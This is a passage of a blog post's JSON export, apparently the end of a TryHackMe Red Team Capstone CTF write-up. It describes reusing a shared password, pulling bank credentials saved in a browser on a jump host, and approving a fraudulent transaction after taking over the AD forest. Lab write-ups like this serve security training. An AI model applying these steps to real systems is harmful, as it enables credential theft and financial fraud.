data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210215433\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210215433.png?fit=878%2C322&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210215433.png?resize=878%2C322&#038;ssl=1\" alt=\"\" class=\"wp-image-538\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210215433.png?w=878&amp;ssl=1 878w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210215433.png?resize=300%2C110&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210215433.png?resize=768%2C282&amp;ssl=1 768w\" sizes=\"auto, (max-width: 878px) 100vw, 878px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>We noticed that the hash for c.young and a.holt users was same. Both users have the same password. This could be intentional or other users working on the lab at tha same lab\u2013since this is a shared environment\u2013might have changes the passwords for the users. Changing the passwords for the users seems easy but it is not recommended.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can log in as <code>c.young<\/code> and forward our transaction.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09122c3a&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09122c3a\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"527\" data-attachment-id=\"539\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210220333\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220333.png?fit=1529%2C787&amp;ssl=1\" data-orig-size=\"1529,787\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210220333\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220333.png?fit=1024%2C527&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220333.png?resize=1024%2C527&#038;ssl=1\" alt=\"\" class=\"wp-image-539\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220333.png?resize=1024%2C527&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220333.png?resize=300%2C154&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220333.png?resize=768%2C395&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220333.png?w=1529&amp;ssl=1 1529w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09123436&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09123436\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"530\" data-attachment-id=\"540\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210220428\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220428.png?fit=1515%2C784&amp;ssl=1\" data-orig-size=\"1515,784\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210220428\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220428.png?fit=1024%2C530&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220428.png?resize=1024%2C530&#038;ssl=1\" alt=\"\" class=\"wp-image-540\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220428.png?resize=1024%2C530&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220428.png?resize=300%2C155&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220428.png?resize=768%2C397&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220428.png?w=1515&amp;ssl=1 1515w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09123be8&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09123be8\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"486\" data-attachment-id=\"541\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210220502\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220502.png?fit=1516%2C719&amp;ssl=1\" data-orig-size=\"1516,719\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210220502\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220502.png?fit=1024%2C486&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220502.png?resize=1024%2C486&#038;ssl=1\" alt=\"\" class=\"wp-image-541\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220502.png?resize=1024%2C486&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220502.png?resize=300%2C142&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220502.png?resize=768%2C364&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220502.png?w=1516&amp;ssl=1 1516w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<p>Next, we need to log in as <code>a.holt<\/code> user and approve the transaction. But for some reason, the credentials won&#8217;t work. We will connect to the JMP machine via RDP and use a.holt&#8217;s AD credentials. After logging in we can see there is a note that clarifies why AD credentials did not work for a.holt on the bank login page.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091243d8&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091243d8\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"526\" data-attachment-id=\"543\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210220802\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220802.png?fit=1505%2C773&amp;ssl=1\" data-orig-size=\"1505,773\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210220802\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220802.png?fit=1024%2C526&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220802.png?resize=1024%2C526&#038;ssl=1\" alt=\"\" class=\"wp-image-543\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220802.png?resize=1024%2C526&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220802.png?resize=300%2C154&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220802.png?resize=768%2C394&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210220802.png?w=1505&amp;ssl=1 1505w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>The approvers account credentials are not same as their AD account.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Upon further enumerating, we notice that when trying to log in to the bank application using Google Chrome, the username and password fields get auto-filled! On checking the Settings in the browser, we see that credentials are saved for the site! We can log in now and approve the transaction.<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09124ab0&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09124ab0\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"521\" data-attachment-id=\"544\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210222841\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210222841.png?fit=1536%2C782&amp;ssl=1\" data-orig-size=\"1536,782\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210222841\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210222841.png?fit=1024%2C521&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210222841.png?resize=1024%2C521&#038;ssl=1\" alt=\"\" class=\"wp-image-544\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210222841.png?resize=1024%2C521&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210222841.png?resize=300%2C153&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210222841.png?resize=768%2C391&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210222841.png?w=1536&amp;ssl=1 1536w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091250fb&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091250fb\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"524\" data-attachment-id=\"545\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240210223147\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210223147.png?fit=1510%2C773&amp;ssl=1\" data-orig-size=\"1510,773\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240210223147\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210223147.png?fit=1024%2C524&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210223147.png?resize=1024%2C524&#038;ssl=1\" alt=\"\" class=\"wp-image-545\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210223147.png?resize=1024%2C524&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210223147.png?resize=300%2C154&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210223147.png?resize=768%2C393&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240210223147.png?w=1510&amp;ssl=1 1510w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Approving the transaction confirms that we have successfully achieved the goal for this challenge! Not only we have compromised the entire AD Forest with three Domain Controllers but also made a fraudulent transaction to show the further impact of the compromise.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"35-conclusion-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Conclusion<\/mark><\/h2>\n\n\n\n<p>Phew! This has been a wild ride. This was the best Red Teaming lab I&#8217;ve worked on so far. Thanks to TryHackMe for this opportunity to practice our red teaming skills. Apart from some frustrating moments&#8211;mostly due to other users changing\/deleting the accounts and passwords, I have thoroughly enjoyed working on this assignment.<\/p>\n\n\n\n<p>In this blog, I have only included the direct path with the least number of steps needed to complete the challenge. There are other attack vectors and may be an even easier way to complete the task. Feel free to ask any questions or if you need any help regarding this lab. <\/p>\n","protected":false},"excerpt":{"rendered":"<p>The Red Team Capstone challenge from TryHackMe is an in-depth network challenge simulating a Red Teaming engagement. The challenge includes several phases structured around the cyber kill chain that will require you to enumerate a perimeter, breach the organization, perform lateral movement, and finally perform goal execution to show impact. To best simulate how these [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[45,1,49,11,44,12],"tags":[],"class_list":["post-447","post","type-post","status-publish","format-standard","hentry","category-active-directory","category-blog","category-ctf","category-ctf-write-ups","category-red-teaming","category-tryhackme"],"aioseo_notices":[],"featured_image_src":null,"author_info":{"display_name":"ishsome","author_link":"https:\/\/blog.ishsome.co